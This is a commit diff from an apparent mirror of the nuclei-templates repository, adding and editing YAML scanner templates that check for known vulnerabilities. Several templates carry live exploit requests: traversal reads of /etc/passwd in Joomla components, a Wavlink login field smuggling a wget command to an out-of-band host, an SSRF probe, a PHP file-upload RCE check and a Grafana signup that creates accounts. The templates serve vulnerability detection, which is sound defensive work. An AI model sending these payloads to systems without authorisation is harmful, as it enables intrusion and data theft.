daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'origin/master' into dynamic_attributes

patch-1
forgedhallpass 2021-08-20 15:34:08 +03:00
parent 77103bc629 b260f2fc87
commit dc4cc62629
18 changed files with 175 additions and 80 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.github/workflows/template-validate.yml vendored
View File

@ -26,7 +26,7 @@ jobs:
env:
GO111MODULE: on
run: |
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei
shell: bash
- name: Template Validation

27
cves/2010/CVE-2010-1533.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1533
info:
name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12142
- https://www.cvedetails.com/cve/CVE-2010-1533
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2036.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2036
info:
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34004
- https://www.cvedetails.com/cve/CVE-2010-2036
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

1
cves/2019/CVE-2019-8446.yaml
View File

@ -12,7 +12,6 @@ requests:
- |
POST /rest/issueNav/1/issueTable HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
Connection: Close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Atlassian-Token: no-check

6
cves/2020/CVE-2020-13117.yaml
View File

@ -14,16 +14,12 @@ requests:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://{{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction

2
cves/2020/CVE-2020-5307.yaml
View File

@ -15,8 +15,6 @@ requests:
POST /dfsms/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Content-Length: 66

2
cves/2021/CVE-2021-24472.yaml
View File

@ -14,8 +14,6 @@ requests:
GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:

2
cves/2021/CVE-2021-26855.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange,oob
tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
reference:
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse

14
cves/2021/CVE-2021-28149.yaml
View File

@ -18,24 +18,12 @@ requests:
Host: {{Hostname}}
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
- |
GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
matchers-condition: and
matchers:

34
cves/2021/CVE-2021-38751.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-38751
info:
name: ExponentCMS <= 2.6 Host Header Injection
author: dwisiswant0
severity: medium
description: |
A HTTP Host header attack exists in ExponentCMS 2.6
and below in /exponent_constants.php. A modified HTTP
header can change links on the webpage to an arbitrary value,
leading to a possible attack vector for MITM.
reference:
- https://github.com/exponentcms/exponent-cms/issues/1544
- https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64
tags: cve,cve2021,exponentcms
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}/login/showlogin"
headers:
Host: "{{randstr}}.tld"
matchers-condition: and
matchers:
- type: regex
regex:
- (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld
part: body
- type: status
status:
- 200

23
exposed-panels/microsoft-exchange-login.yaml
View File

@ -1,23 +0,0 @@
id: exchange-login
info:
name: Microsoft Exchange login page
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6739
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/owa/auth/logon.aspx'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Exchange Log In</title>'
- '<title>Microsoft Exchange - Outlook Web Access</title>'
- type: status
status:
- 200

1
misconfiguration/aem/aem-groovyconsole.yaml
View File

@ -15,7 +15,6 @@ requests:
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
matchers-condition: and
matchers:

35
misconfiguration/grafana-public-signup.yaml Normal file
View File

@ -0,0 +1,35 @@
id: grafana-public-signup
info:
name: Grafana Public Signup
author: pdteam
severity: medium
tags: grafana,intrusive
requests:
- raw:
- |
POST /api/user/signup/step2 HTTP/1.1
Host: {{Hostname}}
content-type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"}
matchers-condition: and
matchers:
- type: word
words:
- "User sign up completed successfully"
- type: word
words:
- "grafana_sess"
- "grafana_user"
condition: and
part: header
- type: status
status:
- 200

3
misconfiguration/springboot/springboot-env.yaml
View File

@ -2,7 +2,7 @@ id: springboot-env
info:
name: Detect Springboot Env Actuator
author: that_juan_,dwisiswant0,wdahlenb
author: that_juan_,dwisiswant0,wdahlenb,philippedelteil
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,exposure
@ -36,5 +36,6 @@ requests:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
- "application/vnd.spring-boot.actuator.v2+json"
condition: or
part: header

19
technologies/microsoft-exchange-server-detect.yaml
View File

@ -2,30 +2,31 @@ id: microsoft-exchange-server-detect
info:
name: Microsoft Exchange Server Detect
author: pikpikcu
author: pikpikcu,dhiyaneshDK
severity: info
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
description: |
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data.
tags: microsoft,exchange,tech
requests:
- method: GET
path:
- "{{BaseURL}}/owa/auth/logon.aspx"
matchers-condition: and
matchers-condition: or
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
part: all
- type: word
words:
- '<title>Exchange Log In</title>'
- '<title>Microsoft Exchange - Outlook Web Access</title>'
extractors:
- type: kval
part: header
kval:
- X-Owa-Version
- X_Owa_Version

26
vulnerabilities/other/caucho-resin-info-disclosure.yaml Normal file
View File

@ -0,0 +1,26 @@
id: caucho-resin-info-disclosure
info:
name: Caucho Resin Information Disclosure
author: pikpikcu
severity: info
reference: https://www.exploit-db.com/exploits/27888
requests:
- method: GET
path:
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
matchers-condition: and
matchers:
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and
- type: status
status:
- 200

25
vulnerabilities/other/showdoc-file-upload-rce.yaml
View File

@ -24,26 +24,19 @@ requests:
<?php echo md5('rce_test');?>
----------------------------835846770881083140190633--
- |
GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
extractors:
- type: regex
name: path
group: 1
internal: true
part: body
regex:
- '/Uploads\\(.*?)"\,"success"'
matchers-condition: and
matchers:
- type: word
words:
- '3c7cb9f46815a790686b857fdbc4295a'
- '"url":"http:'
- '"success":1'
condition: and
- type: status
status:
- 200
- 200
extractors:
- type: json
json:
- '.url'

6
workflows/grafana-workflow.yaml
View File

@ -6,12 +6,8 @@ info:
description: A simple workflow that runs all Grafana related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: exposed-panels/grafana-detect.yaml
subtemplates:
- template: default-logins/grafana/grafana-default-credential.yaml
- tags: grafana